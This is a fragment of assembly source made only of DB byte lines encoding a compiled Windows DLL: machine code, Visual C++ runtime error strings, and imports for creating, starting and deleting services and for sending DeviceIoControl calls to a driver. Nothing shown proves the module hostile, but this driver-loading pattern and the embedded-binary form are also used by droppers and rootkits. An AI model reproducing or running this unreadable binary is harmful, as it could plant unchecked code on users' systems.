DB 00FH,086H,010H,001H,000H,000H,08DH,074H,024H,01AH,038H,044H,024H,01AH,074H
DB 02CH,08AH,046H,001H,084H,0C0H,074H,025H,033H,0C9H,033H,0D2H,08AH,00EH,08AH
DB 0D0H,03BH,0D1H,072H,011H,080H,089H,001H,051H,000H,010H,004H,041H,033H,0C0H
DB 08AH,046H,001H,03BH,0C1H,073H,0EFH,083H,0C6H,002H,080H,03EH,000H,075H,0D4H
DB 0B8H,001H,000H,000H,000H,080H,088H,001H,051H,000H,010H,008H,040H,03DH,0FFH
DB 000H,000H,000H,072H,0F1H,055H,089H,02DH,004H,052H,000H,010H,0E8H,07FH,001H
DB 000H,000H,083H,0C4H,004H,0E9H,0B9H,000H,000H,000H,0BFH,000H,051H,000H,010H
DB 033H,0C0H,0B9H,040H,000H,000H,000H,0F3H,0ABH,0AAH,08BH,04CH,024H,010H,08DH
DB 014H,049H,08DH,03CH,055H,000H,000H,000H,000H,08DH,00CH,007H,08DH,034H,0CDH
DB 038H,052H,000H,010H,080H,03EH,000H,074H,031H,08AH,04EH,001H,084H,0C9H,074H
DB 02AH,033H,0D2H,033H,0DBH,08AH,016H,08AH,0D9H,03BH,0DAH,072H,016H,08AH,088H
DB 020H,052H,000H,010H,008H,08AH,001H,051H,000H,010H,042H,033H,0DBH,08AH,05EH
DB 001H,03BH,0DAH,073H,0F0H,083H,0C6H,002H,080H,03EH,000H,075H,0CFH,040H,083H
DB 0F8H,004H,072H,0BAH,055H,089H,02DH,004H,052H,000H,010H,0E8H,008H,001H,000H
DB 000H,083H,0C4H,004H,0BAH,010H,052H,000H,010H,0A3H,008H,052H,000H,010H,08BH
DB 044H,024H,010H,0C1H,0E0H,004H,08BH,09CH,040H,030H,052H,000H,010H,06AH,019H
DB 08DH,08CH,040H,02CH,052H,000H,010H,08BH,001H,08BH,049H,008H,089H,002H,089H
DB 05AH,004H,089H,04AH,008H,0E8H,062H,006H,000H,000H,083H,0C4H,004H,033H,0C0H
DB 05DH,05FH,05EH,05BH,083H,0C4H,018H,0C3H,033H,0C0H,0A3H,004H,052H,000H,010H
DB 0B9H,010H,052H,000H,010H,06AH,019H,0A3H,008H,052H,000H,010H,033H,0C0H,089H
DB 001H,089H,041H,004H,089H,041H,008H,0E8H,033H,006H,000H,000H,083H,0C4H,004H
DB 033H,0C0H,05DH,05FH,05EH,05BH,083H,0C4H,018H,0C3H,083H,03DH,01CH,052H,000H
DB 010H,000H,074H,019H,0E8H,0E8H,000H,000H,000H,06AH,019H,0E8H,011H,006H,000H
DB 000H,083H,0C4H,004H,033H,0C0H,05DH,05FH,05EH,05BH,083H,0C4H,018H,0C3H,06AH
DB 019H,0E8H,0FDH,005H,000H,000H,083H,0C4H,004H,0B8H,0FFH,0FFH,0FFH,0FFH,05DH
DB 05FH,05EH,05BH,083H,0C4H,018H,0C3H,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH
DB 0CCH,0CCH,0CCH,0CCH,0CCH,0C7H,005H,01CH,052H,000H,010H,000H,000H,000H,000H
DB 08BH,044H,024H,004H,083H,0F8H,0FEH,075H,010H,0C7H,005H,01CH,052H,000H,010H
DB 001H,000H,000H,000H,0FFH,025H,0B4H,0C1H,000H,010H,083H,0F8H,0FDH,075H,010H
DB 0C7H,005H,01CH,052H,000H,010H,001H,000H,000H,000H,0FFH,025H,0B0H,0C1H,000H
DB 010H,083H,0F8H,0FCH,075H,00FH,0C7H,005H,01CH,052H,000H,010H,001H,000H,000H
DB 000H,0A1H,0D8H,057H,000H,010H,0C3H,0CCH,0CCH,0CCH,08BH,044H,024H,004H,02DH
DB 0A4H,003H,000H,000H,083H,0F8H,012H,077H,00FH,033H,0C9H,08AH,088H,05CH,023H
DB 000H,010H,0FFH,024H,08DH,048H,023H,000H,010H,033H,0C0H,0C3H,0B8H,011H,004H
DB 000H,000H,0C3H,0B8H,004H,008H,000H,000H,0C3H,0B8H,012H,004H,000H,000H,0C3H
DB 0B8H,004H,004H,000H,000H,0C3H,030H,023H,000H,010H,036H,023H,000H,010H,03CH
DB 023H,000H,010H,042H,023H,000H,010H,02DH,023H,000H,010H,000H,004H,004H,004H
DB 001H,004H,004H,004H,004H,004H,004H,004H,004H,004H,004H,004H,004H,002H,003H
DB 0CCH,057H,033H,0C0H,0BFH,000H,051H,000H,010H,0B9H,040H,000H,000H,000H,0F3H
DB 0ABH,0AAH,0A3H,010H,052H,000H,010H,0B9H,010H,052H,000H,010H,05FH,0A3H,004H
DB 052H,000H,010H,0A3H,008H,052H,000H,010H,089H,041H,004H,089H,041H,008H,0C3H
DB 06EH,06FH,074H,020H,065H,06EH,06FH,075H,067H,068H,020H,073H,070H,061H,063H
DB 065H,020H,066H,06FH,072H,020H,074H,068H,072H,065H,061H,064H,020H,064H,061H
DB 074H,061H,00DH,00AH,000H,00DH,00AH,061H,062H,06EH,06FH,072H,06DH,061H,06CH
DB 020H,070H,072H,06FH,067H,072H,061H,06DH,020H,074H,065H,072H,06DH,069H,06EH
DB 061H,074H,069H,06FH,06EH,00DH,00AH,000H,000H,000H,000H,052H,036H,030H,030H
DB 039H,00DH,00AH,02DH,020H,06EH,06FH,074H,020H,065H,06EH,06FH,075H,067H,068H
DB 020H,073H,070H,061H,063H,065H,020H,066H,06FH,072H,020H,065H,06EH,076H,069H
DB 072H,06FH,06EH,06DH,065H,06EH,074H,00DH,00AH,000H,052H,036H,030H,030H,038H
DB 00DH,00AH,02DH,020H,06EH,06FH,074H,020H,065H,06EH,06FH,075H,067H,068H,020H
DB 073H,070H,061H,063H,065H,020H,066H,06FH,072H,020H,061H,072H,067H,075H,06DH
DB 065H,06EH,074H,073H,00DH,00AH,000H,000H,000H,052H,036H,030H,030H,032H,00DH
DB 00AH,02DH,020H,066H,06CH,06FH,061H,074H,069H,06EH,067H,020H,070H,06FH,069H
DB 06EH,074H,020H,06EH,06FH,074H,020H,06CH,06FH,061H,064H,065H,064H,00DH,00AH
DB 000H,000H,000H,000H,000H,000H,000H,000H,002H,000H,000H,000H,05CH,055H,000H
DB 010H,008H,000H,000H,000H,030H,055H,000H,010H,009H,000H,000H,000H,004H,055H
DB 000H,010H,00AH,000H,000H,000H,0E0H,054H,000H,010H,010H,000H,000H,000H,0B4H
DB 054H,000H,010H,011H,000H,000H,000H,084H,054H,000H,010H,012H,000H,000H,000H
DB 060H,054H,000H,010H,013H,000H,000H,000H,034H,054H,000H,010H,018H,000H,000H
DB 000H,0FCH,053H,000H,010H,019H,000H,000H,000H,0D4H,053H,000H,010H,01AH,000H
DB 000H,000H,09CH,053H,000H,010H,01BH,000H,000H,000H,064H,053H,000H,010H,078H
DB 000H,000H,000H,054H,053H,000H,010H,079H,000H,000H,000H,044H,053H,000H,010H
DB 07AH,000H,000H,000H,034H,053H,000H,010H,0FCH,000H,000H,000H,030H,053H,000H
DB 010H,0FFH,000H,000H,000H,020H,053H,000H,010H,000H,000H,000H,000H,04DH,069H
DB 063H,072H,06FH,073H,06FH,066H,074H,020H,056H,069H,073H,075H,061H,06CH,020H
DB 043H,02BH,02BH,020H,052H,075H,06EH,074H,069H,06DH,065H,020H,04CH,069H,062H
DB 072H,061H,072H,079H,000H,000H,000H,000H,00AH,00AH,000H,000H,052H,075H,06EH
DB 074H,069H,06DH,065H,020H,045H,072H,072H,06FH,072H,021H,00AH,00AH,050H,072H
DB 06FH,067H,072H,061H,06DH,03AH,020H,000H,000H,000H,02EH,02EH,02EH,000H,03CH
DB 070H,072H,06FH,067H,072H,061H,06DH,020H,06EH,061H,06DH,065H,020H,075H,06EH
DB 06BH,06EH,06FH,077H,06EH,03EH,000H,000H,000H,000H,000H,000H,0E0H,05FH,000H
DB 010H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,0C8H
DB 05FH,000H,010H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 0F8H,05FH,000H,010H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,010H,060H,000H,010H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,005H,000H,000H,0C0H,00BH,000H,000H,000H,000H,000H
DB 000H,000H,01DH,000H,000H,0C0H,004H,000H,000H,000H,000H,000H,000H,000H,096H
DB 000H,000H,0C0H,004H,000H,000H,000H,000H,000H,000H,000H,08DH,000H,000H,0C0H
DB 008H,000H,000H,000H,000H,000H,000H,000H,08EH,000H,000H,0C0H,008H,000H,000H
DB 000H,000H,000H,000H,000H,08FH,000H,000H,0C0H,008H,000H,000H,000H,000H,000H
DB 000H,000H,090H,000H,000H,0C0H,008H,000H,000H,000H,000H,000H,000H,000H,091H
DB 000H,000H,0C0H,008H,000H,000H,000H,000H,000H,000H,000H,092H,000H,000H,0C0H
DB 008H,000H,000H,000H,000H,000H,000H,000H,093H,000H,000H,0C0H,008H,000H,000H
DB 000H,000H,000H,000H,000H,003H,000H,000H,000H,007H,000H,000H,000H,078H,000H
DB 000H,000H,00AH,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,047H,065H,074H,04CH,061H,073H,074H,041H,063H,074H,069H,076H,065H,050H
DB 06FH,070H,075H,070H,000H,000H,047H,065H,074H,041H,063H,074H,069H,076H,065H
DB 057H,069H,06EH,064H,06FH,077H,000H,04DH,065H,073H,073H,061H,067H,065H,042H
DB 06FH,078H,041H,000H,075H,073H,065H,072H,033H,032H,02EH,064H,06CH,06CH,000H
DB 000H,000H,000H,000H,000H,020H,0A4H,000H,010H,000H,000H,000H,000H,020H,0A4H
DB 000H,010H,001H,001H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 010H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,002H,000H,000H,000H,001H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,002H,000H,000H,000H,002H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,00AH,000H,000H,000H,000H,000H,000H
DB 000H,041H,073H,073H,065H,072H,074H,069H,06FH,06EH,020H,066H,061H,069H,06CH
DB 065H,064H,03AH,020H,025H,073H,02CH,020H,066H,069H,06CH,065H,020H,025H,073H
DB 02CH,020H,06CH,069H,06EH,065H,020H,025H,064H,00AH,000H,05CH,056H,000H,010H
DB 0B0H,05AH,000H,010H,03CH,056H,000H,010H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,001H,000H
DB 000H,000H,016H,000H,000H,000H,002H,000H,000H,000H,002H,000H,000H,000H,003H
DB 000H,000H,000H,002H,000H,000H,000H,004H,000H,000H,000H,018H,000H,000H,000H
DB 005H,000H,000H,000H,00DH,000H,000H,000H,006H,000H,000H,000H,009H,000H,000H
DB 000H,007H,000H,000H,000H,00CH,000H,000H,000H,008H,000H,000H,000H,00CH,000H
DB 000H,000H,009H,000H,000H,000H,00CH,000H,000H,000H,00AH,000H,000H,000H,007H
DB 000H,000H,000H,00BH,000H,000H,000H,008H,000H,000H,000H,00CH,000H,000H,000H
DB 016H,000H,000H,000H,00DH,000H,000H,000H,016H,000H,000H,000H,00FH,000H,000H
DB 000H,002H,000H,000H,000H,010H,000H,000H,000H,00DH,000H,000H,000H,011H,000H
DB 000H,000H,012H,000H,000H,000H,012H,000H,000H,000H,002H,000H,000H,000H,021H
DB 000H,000H,000H,00DH,000H,000H,000H,035H,000H,000H,000H,002H,000H,000H,000H
DB 041H,000H,000H,000H,00DH,000H,000H,000H,043H,000H,000H,000H,002H,000H,000H
DB 000H,050H,000H,000H,000H,011H,000H,000H,000H,052H,000H,000H,000H,00DH,000H
DB 000H,000H,053H,000H,000H,000H,00DH,000H,000H,000H,057H,000H,000H,000H,016H
DB 000H,000H,000H,059H,000H,000H,000H,00BH,000H,000H,000H,06CH,000H,000H,000H
DB 00DH,000H,000H,000H,06DH,000H,000H,000H,020H,000H,000H,000H,070H,000H,000H
DB 000H,01CH,000H,000H,000H,072H,000H,000H,000H,009H,000H,000H,000H,006H,000H
DB 000H,000H,016H,000H,000H,000H,080H,000H,000H,000H,00AH,000H,000H,000H,081H
DB 000H,000H,000H,00AH,000H,000H,000H,082H,000H,000H,000H,009H,000H,000H,000H
DB 083H,000H,000H,000H,016H,000H,000H,000H,084H,000H,000H,000H,00DH,000H,000H
DB 000H,091H,000H,000H,000H,029H,000H,000H,000H,09EH,000H,000H,000H,00DH,000H
DB 000H,000H,0A1H,000H,000H,000H,002H,000H,000H,000H,0A4H,000H,000H,000H,00BH
DB 000H,000H,000H,0A7H,000H,000H,000H,00DH,000H,000H,000H,0B7H,000H,000H,000H
DB 011H,000H,000H,000H,0CEH,000H,000H,000H,002H,000H,000H,000H,0D7H,000H,000H
DB 000H,00BH,000H,000H,000H,018H,007H,000H,000H,00CH,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,028H,000H,06EH,000H,075H,000H,06CH,000H,06CH
DB 000H,029H,000H,000H,000H,000H,000H,028H,06EH,075H,06CH,06CH,029H,000H,000H
DB 080H,05CH,000H,010H,070H,05CH,000H,010H,0C0H,037H,000H,010H,0C0H,037H,000H
DB 010H,0C0H,037H,000H,010H,0C0H,037H,000H,010H,0C0H,037H,000H,010H,0C0H,037H
DB 000H,010H,0B2H,05CH,000H,010H,0B2H,05CH,000H,010H,000H,000H,020H,000H,020H
DB 000H,020H,000H,020H,000H,020H,000H,020H,000H,020H,000H,020H,000H,020H,000H
DB 028H,000H,028H,000H,028H,000H,028H,000H,028H,000H,020H,000H,020H,000H,020H
DB 000H,020H,000H,020H,000H,020H,000H,020H,000H,020H,000H,020H,000H,020H,000H
DB 020H,000H,020H,000H,020H,000H,020H,000H,020H,000H,020H,000H,020H,000H,020H
DB 000H,048H,000H,010H,000H,010H,000H,010H,000H,010H,000H,010H,000H,010H,000H
DB 010H,000H,010H,000H,010H,000H,010H,000H,010H,000H,010H,000H,010H,000H,010H
DB 000H,010H,000H,084H,000H,084H,000H,084H,000H,084H,000H,084H,000H,084H,000H
DB 084H,000H,084H,000H,084H,000H,084H,000H,010H,000H,010H,000H,010H,000H,010H
DB 000H,010H,000H,010H,000H,010H,000H,081H,000H,081H,000H,081H,000H,081H,000H
DB 081H,000H,081H,000H,001H,000H,001H,000H,001H,000H,001H,000H,001H,000H,001H
DB 000H,001H,000H,001H,000H,001H,000H,001H,000H,001H,000H,001H,000H,001H,000H
DB 001H,000H,001H,000H,001H,000H,001H,000H,001H,000H,001H,000H,001H,000H,010H
DB 000H,010H,000H,010H,000H,010H,000H,010H,000H,010H,000H,082H,000H,082H,000H
DB 082H,000H,082H,000H,082H,000H,082H,000H,002H,000H,002H,000H,002H,000H,002H
DB 000H,002H,000H,002H,000H,002H,000H,002H,000H,002H,000H,002H,000H,002H,000H
DB 002H,000H,002H,000H,002H,000H,002H,000H,002H,000H,002H,000H,002H,000H,002H
DB 000H,002H,000H,010H,000H,010H,000H,010H,000H,010H,000H,020H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,001H,000H,000H,000H,02EH,000H,000H,000H,001H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,070H,0C0H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 04EH,0C2H,000H,000H,044H,0C1H,000H,000H,01CH,0C1H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,068H,0C2H,000H,000H,0F0H,0C1H,000H,000H,050H,0C0H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,0F0H,0C2H,000H,000H,024H
DB 0C1H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,0E0H,0C2H,000H,000H,0CEH,0C2H,000H
DB 000H,08AH,0C2H,000H,000H,074H,0C2H,000H,000H,0AEH,0C2H,000H,000H,0BEH,0C2H
DB 000H,000H,09CH,0C2H,000H,000H,000H,000H,000H,000H,040H,0C2H,000H,000H,030H
DB 0C2H,000H,000H,018H,0C2H,000H,000H,006H,0C2H,000H,000H,0B8H,0C3H,000H,000H
DB 036H,0C4H,000H,000H,020H,0C4H,000H,000H,0FEH,0C2H,000H,000H,010H,0C3H,000H
DB 000H,022H,0C3H,000H,000H,036H,0C3H,000H,000H,044H,0C3H,000H,000H,052H,0C3H
DB 000H,000H,068H,0C3H,000H,000H,076H,0C3H,000H,000H,082H,0C3H,000H,000H,08CH
DB 0C3H,000H,000H,09CH,0C3H,000H,000H,0AAH,0C3H,000H,000H,0F8H,0C1H,000H,000H
DB 0C6H,0C3H,000H,000H,0D8H,0C3H,000H,000H,0E6H,0C3H,000H,000H,0F6H,0C3H,000H
DB 000H,008H,0C4H,000H,000H,068H,0C5H,000H,000H,078H,0C5H,000H,000H,042H,0C4H
DB 000H,000H,04CH,0C4H,000H,000H,058H,0C4H,000H,000H,072H,0C4H,000H,000H,08AH
DB 0C4H,000H,000H,0A4H,0C4H,000H,000H,0BEH,0C4H,000H,000H,0D4H,0C4H,000H,000H
DB 0E0H,0C4H,000H,000H,0FCH,0C4H,000H,000H,014H,0C5H,000H,000H,02CH,0C5H,000H
DB 000H,038H,0C5H,000H,000H,044H,0C5H,000H,000H,054H,0C5H,000H,000H,000H,000H
DB 000H,000H,05CH,0C2H,000H,000H,000H,000H,000H,000H,0E0H,0C2H,000H,000H,0CEH
DB 0C2H,000H,000H,08AH,0C2H,000H,000H,074H,0C2H,000H,000H,0AEH,0C2H,000H,000H
DB 0BEH,0C2H,000H,000H,09CH,0C2H,000H,000H,000H,000H,000H,000H,040H,0C2H,000H
DB 000H,030H,0C2H,000H,000H,018H,0C2H,000H,000H,006H,0C2H,000H,000H,0B8H,0C3H
DB 000H,000H,036H,0C4H,000H,000H,020H,0C4H,000H,000H,0FEH,0C2H,000H,000H,010H
DB 0C3H,000H,000H,022H,0C3H,000H,000H,036H,0C3H,000H,000H,044H,0C3H,000H,000H
DB 052H,0C3H,000H,000H,068H,0C3H,000H,000H,076H,0C3H,000H,000H,082H,0C3H,000H
DB 000H,08CH,0C3H,000H,000H,09CH,0C3H,000H,000H,0AAH,0C3H,000H,000H,0F8H,0C1H
DB 000H,000H,0C6H,0C3H,000H,000H,0D8H,0C3H,000H,000H,0E6H,0C3H,000H,000H,0F6H
DB 0C3H,000H,000H,008H,0C4H,000H,000H,068H,0C5H,000H,000H,078H,0C5H,000H,000H
DB 042H,0C4H,000H,000H,04CH,0C4H,000H,000H,058H,0C4H,000H,000H,072H,0C4H,000H
DB 000H,08AH,0C4H,000H,000H,0A4H,0C4H,000H,000H,0BEH,0C4H,000H,000H,0D4H,0C4H
DB 000H,000H,0E0H,0C4H,000H,000H,0FCH,0C4H,000H,000H,014H,0C5H,000H,000H,02CH
DB 0C5H,000H,000H,038H,0C5H,000H,000H,044H,0C5H,000H,000H,054H,0C5H,000H,000H
DB 000H,000H,000H,000H,05CH,0C2H,000H,000H,000H,000H,000H,000H,016H,000H,043H
DB 06CH,06FH,073H,065H,048H,061H,06EH,064H,06CH,065H,000H,047H,000H,044H,065H
DB 076H,069H,063H,065H,049H,06FH,043H,06FH,06EH,074H,072H,06FH,06CH,000H,0C2H
DB 000H,047H,065H,074H,043H,075H,072H,072H,065H,06EH,074H,044H,069H,072H,065H
DB 063H,074H,06FH,072H,079H,041H,000H,000H,0E1H,000H,047H,065H,074H,04CH,061H
DB 073H,074H,045H,072H,072H,06FH,072H,000H,000H,02BH,000H,043H,072H,065H,061H
DB 074H,065H,046H,069H,06CH,065H,041H,000H,04BH,045H,052H,04EH,045H,04CH,033H
DB 032H,02EH,064H,06CH,06CH,000H,000H,049H,002H,077H,073H,070H,072H,069H,06EH
DB 074H,066H,041H,000H,055H,053H,045H,052H,033H,032H,02EH,064H,06CH,06CH,000H
DB 000H,016H,000H,043H,06CH,06FH,073H,065H,053H,065H,072H,076H,069H,063H,065H
DB 048H,061H,06EH,064H,06CH,065H,000H,000H,0B1H,000H,04FH,070H,065H,06EH,053H
DB 043H,04DH,061H,06EH,061H,067H,065H,072H,041H,000H,000H,01CH,000H,043H,072H
DB 065H,061H,074H,065H,053H,065H,072H,076H,069H,063H,065H,041H,000H,000H,006H
DB 001H,053H,074H,061H,072H,074H,053H,065H,072H,076H,069H,063H,065H,041H,000H
DB 0B3H,000H,04FH,070H,065H,06EH,053H,065H,072H,076H,069H,063H,065H,041H,000H
DB 000H,017H,000H,043H,06FH,06EH,074H,072H,06FH,06CH,053H,065H,072H,076H,069H
DB 063H,065H,000H,000H,01FH,000H,044H,065H,06CH,065H,074H,065H,053H,065H,072H
DB 076H,069H,063H,065H,000H,041H,044H,056H,041H,050H,049H,033H,032H,02EH,064H
DB 06CH,06CH,000H,000H,09FH,000H,047H,065H,074H,043H,06FH,06DH,06DH,061H,06EH
DB 064H,04CH,069H,06EH,065H,041H,000H,003H,001H,047H,065H,074H,050H,072H,06FH
DB 063H,041H,064H,064H,072H,065H,073H,073H,000H,000H,0EBH,000H,047H,065H,074H
DB 04DH,06FH,064H,075H,06CH,065H,048H,061H,06EH,064H,06CH,065H,041H,000H,000H
DB 037H,001H,047H,065H,074H,056H,065H,072H,073H,069H,06FH,06EH,000H,000H,062H
DB 000H,045H,078H,069H,074H,050H,072H,06FH,063H,065H,073H,073H,000H,0C7H,000H
DB 047H,065H,074H,043H,075H,072H,072H,065H,06EH,074H,054H,068H,072H,065H,061H
DB 064H,049H,064H,000H,000H,022H,002H,054H,06CH,073H,053H,065H,074H,056H,061H
